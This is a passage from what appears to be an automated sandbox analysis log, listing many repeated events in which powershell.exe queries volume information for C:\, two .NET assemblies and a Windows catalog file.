                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
